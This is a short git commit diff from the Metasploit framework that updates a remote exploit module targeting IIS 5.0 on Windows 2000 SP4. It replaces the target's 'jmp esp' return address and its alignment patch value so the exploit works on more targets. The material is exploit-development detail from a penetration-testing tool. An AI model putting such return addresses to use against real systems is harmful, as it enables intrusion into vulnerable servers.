Updated patch and return address for better compatibility with more targets
git-svn-id: file:///home/svn/framework3/trunk@6992 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
660ae9444b
commit
ca22f6fa98
|
@ -50,13 +50,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
[
|
||||
'Windows 2000 SP4 Universal (IIS 5.0)',
|
||||
'Windows 2000 SP4 English/Italian (IIS 5.0)',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Ret' => 0x77f4b19b, # jmp esp from kcope's code
|
||||
'Patch' => 0x7ffa7ffa, # works for off-by-two alignment
|
||||
'Ret' => 0x77e3c256, # jmp esp in user32 SP4 EN/IT
|
||||
'Patch' => 0x7ffd7ffd # works for off-by-two alignment
|
||||
},
|
||||
],
|
||||
],
|
||||
|
|
Loading…
Reference in New Issue